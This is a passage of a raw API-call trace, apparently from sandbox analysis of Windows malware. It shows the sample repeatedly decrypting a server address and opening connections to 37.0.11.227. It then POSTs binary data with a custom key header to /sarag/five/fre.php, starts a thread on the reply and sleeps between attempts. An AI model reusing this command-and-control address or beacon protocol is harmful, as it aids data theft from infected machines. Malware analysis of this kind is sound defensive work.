(lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.354] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.355] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.355] GetProcessHeap () returned 0x690000 [0267.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0267.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.357] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0267.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.358] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0267.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.361] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0267.361] GetProcessHeap () returned 0x690000 [0267.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.363] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0267.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.364] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0267.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.365] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0267.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.367] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0267.367] GetProcessHeap () returned 0x690000 [0267.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0267.367] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0267.367] GetProcessHeap () returned 0x690000 [0267.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0267.367] socket (af=2, type=1, protocol=6) returned 0x7e0 [0267.367] connect (s=0x7e0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0267.394] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0267.394] GetProcessHeap () returned 0x690000 [0267.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0267.394] GetProcessHeap () returned 0x690000 [0267.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0267.395] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.396] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.396] GetProcessHeap () returned 0x690000 [0267.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0267.396] GetProcessHeap () returned 0x690000 [0267.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.397] GetProcessHeap () returned 0x690000 [0267.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0267.397] GetProcessHeap () returned 0x690000 [0267.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0267.397] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.398] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.398] GetProcessHeap () returned 0x690000 [0267.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0267.398] GetProcessHeap () returned 0x690000 [0267.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.399] send (s=0x7e0, buf=0x6ad508*, len=242, flags=0) returned 242 [0267.399] send (s=0x7e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0267.400] GetProcessHeap () returned 0x690000 [0267.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0267.400] recv (in: s=0x7e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0267.478] GetProcessHeap () returned 0x690000 [0267.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0267.479] GetProcessHeap () returned 0x690000 [0267.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0267.480] GetProcessHeap () returned 0x690000 [0267.481] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0267.481] GetProcessHeap () returned 0x690000 [0267.481] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0267.481] closesocket (s=0x7e0) returned 0 [0267.482] GetProcessHeap () returned 0x690000 [0267.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0267.482] GetProcessHeap () returned 0x690000 [0267.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.482] GetProcessHeap () returned 0x690000 [0267.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0267.483] GetProcessHeap () returned 0x690000 [0267.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1598) returned 0x7e0 [0267.493] Sleep (dwMilliseconds=0xea60) [0267.495] GetProcessHeap () returned 0x690000 [0267.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0267.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0267.523] GetProcessHeap () returned 0x690000 [0267.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0267.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.524] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.527] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.528] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.528] GetProcessHeap () returned 0x690000 [0267.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0267.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.530] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0267.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.534] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.535] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0267.535] GetProcessHeap () returned 0x690000 [0267.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0267.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.542] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.545] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.545] GetProcessHeap () returned 0x690000 [0267.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0267.545] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.545] GetProcessHeap () returned 0x690000 [0267.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.546] GetProcessHeap () returned 0x690000 [0267.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0267.547] GetProcessHeap () returned 0x690000 [0267.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0267.549] GetProcessHeap () returned 0x690000 [0267.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0267.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0267.561] GetProcessHeap () returned 0x690000 [0267.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0267.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.562] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.563] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.564] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.564] GetProcessHeap () returned 0x690000 [0267.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0267.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.565] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0267.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.566] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.567] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0267.567] GetProcessHeap () returned 0x690000 [0267.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.568] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0267.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.569] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0267.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.571] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0267.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.572] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0267.572] GetProcessHeap () returned 0x690000 [0267.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0267.572] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0267.572] GetProcessHeap () returned 0x690000 [0267.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0267.573] socket (af=2, type=1, protocol=6) returned 0x7e4 [0267.573] connect (s=0x7e4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0267.597] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0267.597] GetProcessHeap () returned 0x690000 [0267.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0267.597] GetProcessHeap () returned 0x690000 [0267.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0267.598] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.599] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.599] GetProcessHeap () returned 0x690000 [0267.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0267.599] GetProcessHeap () returned 0x690000 [0267.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.600] GetProcessHeap () returned 0x690000 [0267.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0267.600] GetProcessHeap () returned 0x690000 [0267.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0267.601] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.601] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.601] GetProcessHeap () returned 0x690000 [0267.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0267.601] GetProcessHeap () returned 0x690000 [0267.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.602] send (s=0x7e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0267.605] send (s=0x7e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0267.605] GetProcessHeap () returned 0x690000 [0267.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0267.605] recv (in: s=0x7e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0267.680] GetProcessHeap () returned 0x690000 [0267.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0267.681] GetProcessHeap () returned 0x690000 [0267.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0267.682] GetProcessHeap () returned 0x690000 [0267.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0267.682] GetProcessHeap () returned 0x690000 [0267.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0267.682] closesocket (s=0x7e4) returned 0 [0267.683] GetProcessHeap () returned 0x690000 [0267.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0267.683] GetProcessHeap () returned 0x690000 [0267.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.683] GetProcessHeap () returned 0x690000 [0267.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0267.684] GetProcessHeap () returned 0x690000 [0267.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x159c) returned 0x7e4 [0267.686] Sleep (dwMilliseconds=0xea60) [0267.687] GetProcessHeap () returned 0x690000 [0267.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0267.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.692] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0267.709] GetProcessHeap () returned 0x690000 [0267.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0267.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.711] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0267.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.739] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.741] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.741] GetProcessHeap () returned 0x690000 [0267.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0267.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.742] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0267.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.744] CryptDestroyKey (hKey=0x69d628) returned 1 [0267.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.745] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0267.745] GetProcessHeap () returned 0x690000 [0267.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.748] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.749] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.750] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.752] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.752] GetProcessHeap () returned 0x690000 [0267.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0267.752] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.752] GetProcessHeap () returned 0x690000 [0267.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.753] GetProcessHeap () returned 0x690000 [0267.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.753] GetProcessHeap () returned 0x690000 [0267.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0267.754] GetProcessHeap () returned 0x690000 [0267.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0267.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.755] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0267.767] GetProcessHeap () returned 0x690000 [0267.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0267.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.771] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.772] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.774] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.774] GetProcessHeap () returned 0x690000 [0267.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0267.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.776] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0267.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.777] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.778] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0267.778] GetProcessHeap () returned 0x690000 [0267.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.782] StrStrA 